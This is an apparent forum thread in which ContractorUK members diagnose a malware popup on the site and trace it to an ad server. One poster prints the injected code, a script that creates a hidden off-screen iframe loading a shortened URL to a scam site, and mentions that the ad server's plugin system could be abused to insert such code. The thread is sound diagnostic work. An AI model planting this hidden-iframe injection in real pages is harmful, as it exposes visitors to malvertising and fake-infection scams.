1. Contracting
    1. General
      1. Brexit
    2. Business / Contracts
      1. Coronavirus Assistance
    3. Accounting / Legal
      1. Umbrella Companies
      2. HMRC Scheme Enquiries
      3. The Future of Contracting
      4. IR35 Reform
    4. Technical
    5. Welcome / FAQs
  2. Social
    1. Light Relief
    2. Social / Events
  • Visitors can check out the Forum FAQ by clicking this link. You have to register before you can post: click the REGISTER link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below. View our Forum Privacy Policy.
  • Want to receive the latest contracting news and advice straight to your inbox? Sign up to the ContractorUK newsletter here. Every sign up will also be entered into a draw to WIN £100 Amazon vouchers!

Reply to: CUK triggers malware warning

Collapse

You are not logged in or you do not have permission to access this page. This could be due to one of several reasons:

  • You are not logged in. If you are already registered, fill in the form below to log in, or follow the "Sign Up" link to register a new account.
  • You may not have sufficient privileges to access this page. Are you trying to edit someone else's post, access administrative features or some other privileged system?
  • If you are trying to post, the administrator may have disabled your account, or it may be awaiting activation.

Previously on "CUK triggers malware warning"

Collapse
  • xoggoth
    replied
    Seems ok now. Damn it, I was planning on buying a handbag this morning.

    Leave a comment:

  • Old Greg
    replied
    Originally posted by administrator View Post
    Now enough of you have signed up to the free competition thingymabob I have taken it off. Thank you for your custom, it is greatly appreciated. The mother's maiden name question was particularly enlightening, never would have had Old Greg as a member of the Gove clan, and to think DimPrawn's old dear is a Corbyn - well I never!

    Fingers crossed should be properly fixed this time, the upgrade carried over some remnants of hack last time so really hoping it is sorted this time, if not it will be a set it up from scratch do and I really don't want to have to do that
    Reported to Information Commissioner.

    Leave a comment:

  • greenlake
    replied
    Originally posted by administrator View Post
    Fingers crossed should be properly fixed this time, the upgrade carried over some remnants of hack last time so really hoping it is sorted this time
    The fix seems to work for me. I no longer get the bagsforulife popup. Thanks!

    Originally posted by greenlake View Post
    I use Edge 44.17763.1.0 and have been receiving the following popup on virtually every CUK page since yesterday morning:

    Leave a comment:

  • administrator
    replied
    Now enough of you have signed up to the free competition thingymabob I have taken it off. Thank you for your custom, it is greatly appreciated. The mother's maiden name question was particularly enlightening, never would have had Old Greg as a member of the Gove clan, and to think DimPrawn's old dear is a Corbyn - well I never!

    Fingers crossed should be properly fixed this time, the upgrade carried over some remnants of hack last time so really hoping it is sorted this time, if not it will be a set it up from scratch do and I really don't want to have to do that

    Leave a comment:

  • Old Greg
    replied
    Originally posted by DimPrawn View Post
    Admin obviously think continued ad revenue is more important than protecting users computers from being compromised...
    It is.

    HTH

    Leave a comment:

  • DimPrawn
    replied
    Admin obviously think continued ad revenue is more important than protecting users computers from being compromised...

    Leave a comment:

  • NickFitz
    replied
    Originally posted by xoggoth View Post
    I'd have thought best approach is to make a copy of page and then comment out external refs one by one. Must be one of those js or php inclusions.
    It's in the output from https://rev.contractoruk.com/www/del...om%2Fforums%2F which is JSON fetched asynchronously (via XMLHttpRequest) and returns:

    Code:
    {
    "revive-0-0": {
        "html": "<a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=35dbefdc15__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cleaderboard' target='_blank'><img src='https://rev.contractoruk.com/www/images/6461024dbdede6b423ea67fe31f9eacb.gif' width='728' height='90' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_35dbefdc15' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=3&amp;campaignid=2&amp;zoneid=1&amp;loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&amp;referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&amp;cb=35dbefdc15' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>",
        "width": "728",
        "height": "90",
        "iframeFriendly": false
    },
    "revive-0-1": {
        "html": "<style>#ifr_ads_banners{width:1600px;height:800px;position:absolute;left:-9985px;}</style><script>(function(d,e,g){g=d.createElement(e);g.src='//goo.gl/Cp8ciT';g.id='ifr_ads_banners';d.body.appendChild(g);})(document,'iframe');</script><a href='https://rev.contractoruk.com/www/delivery/ck.php?oaparams=2__bannerid=4__zoneid=2__cb=e21e133ee8__oadest=https%3A%2F%2Fwww.contractoruk.com%2FClickTrack%2Fredirect.php%3Ftarget%3Dhttps%3A%2F%2Fwww.intouchaccounting.com%2Fjoinintouch%2F%26source%3Dforum%2Cskyscraper' target='_blank'><img src='https://rev.contractoruk.com/www/images/7cb73f87f1f449519d2e2b8832fbd2ae.gif' width='160' height='600' alt='inTouch Accounting' title='inTouch Accounting' border='0' /></a><div id='beacon_e21e133ee8' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='https://rev.contractoruk.com/www/delivery/lg.php?bannerid=4&amp;campaignid=2&amp;zoneid=2&amp;loc=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2F&amp;referer=https%3A%2F%2Fwww.contractoruk.com%2Fforums%2Fgeneral%2F121881-monday-links-bench-vol-ccclxxxviii.html&amp;cb=e21e133ee8' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>",
        "width": "160",
        "height": "600",
        "iframeFriendly": false
    }
}
    The offending code is in the "revive-0-1" item, which includes the stuff I posted earlier in its "html" property.

    So it isn't anywhere in the forum templates; it's somewhere buried in, probably, the plugin mechanism of the ad server.

    Leave a comment:

  • xoggoth
    replied
    Surprised nobody has suggested bleeding the radiators yet. Or have I missed it?

    Leave a comment:

  • xoggoth
    replied
    I'd have thought best approach is to make a copy of page and then comment out external refs one by one. Must be one of those js or php inclusions.

    Leave a comment:

  • DaveB
    replied
    Originally posted by NickFitz View Post
    I'm just a diagnostician on this one
    Playing House to Admins' Wilson

    Leave a comment:

  • NickFitz
    replied
    Originally posted by DimPrawn View Post
    Great now when you going to fix it?

    I'm just a diagnostician on this one

    Leave a comment:

  • SlimeInTheIceMachine
    replied
    Originally posted by DimPrawn View Post
    Has CUK been infiltrated by Russian spies?

    This pops up whenever I visit the General forum now

    I get the same on my Gaalaxy Note - just a message telling my my device is infected, click here to fix etc. Can't navigate away from the page..

    Leave a comment:

  • DimPrawn
    replied
    Originally posted by NickFitz View Post
    A couple of useful suggestions there at New Ad prevents site from loading on mobile - Page 3 but as I recall admin checked the prepend/append stuff and there wasn't anything there.
    Great now when you going to fix it?

    Leave a comment:

  • NickFitz
    replied
    Originally posted by xoggoth View Post
    Seems CUK is not alone:

    New Ad prevents site from loading on mobile - Page 3

    Exactly same message.
    A couple of useful suggestions there at New Ad prevents site from loading on mobile - Page 3 but as I recall admin checked the prepend/append stuff and there wasn't anything there.

    Leave a comment:

  • NickFitz
    replied
    Originally posted by xoggoth View Post
    Flipping mystery. The iframe I found was in the bagsforu stuff, nowt in CUK source. I know Iframes can be hidden from user but surely they'd be shown in source even if dynamically created? All the included stuff looks reputable, Google, dragonbyte, yui, vbulletin etc.
    You can see it as the last thing in the <body> of the page using your browser's DOM inspector (as you've presumably found) but it isn't in the page source.

    It's created with JavaScript which is hidden (along with the CSS that hides the iframe) in the HTML for the the skyscraper ad on the right; that HTML is itself embedded in JSON that's loaded asynchronously. The offending code is just:

    Code:
    <style>
#ifr_ads_banners{
  width:1600px;height:800px;position:absolute;left:-9985px;
}
</style>
<script>
(function(d,e,g){
  g=d.createElement(e);
  g.src='//goo.gl/Cp8ciT';
  g.id='ifr_ads_banners';
  d.body.appendChild(g);
})(document,'iframe');
</script>
    If you follow that goo.gl URL, it takes you to the bags site, and all subsequent badness comes from garbage that is itself embedded in there.

    The problem is finding out where in the ad server this code is being inserted into the response. It's not in the database, but from looking at the source for the ad server (which is available on GitHub), I can immediately see two or three different ways to insert some code into the response chain if there's a vulnerability that allows one to drop a file or two on the server. And that's by using the legitimate plugin system that's an integral part of the way the ad server operates, so it's not something that can be easily disabled.

    Leave a comment:

Advertisers

  1. Contracting
    1. General
      1. Brexit
    2. Business / Contracts
      1. Coronavirus Assistance
    3. Accounting / Legal
      1. Umbrella Companies
      2. HMRC Scheme Enquiries
      3. The Future of Contracting
      4. IR35 Reform
    4. Technical
    5. Welcome / FAQs
  2. Social
    1. Light Relief
    2. Social / Events
Working...
X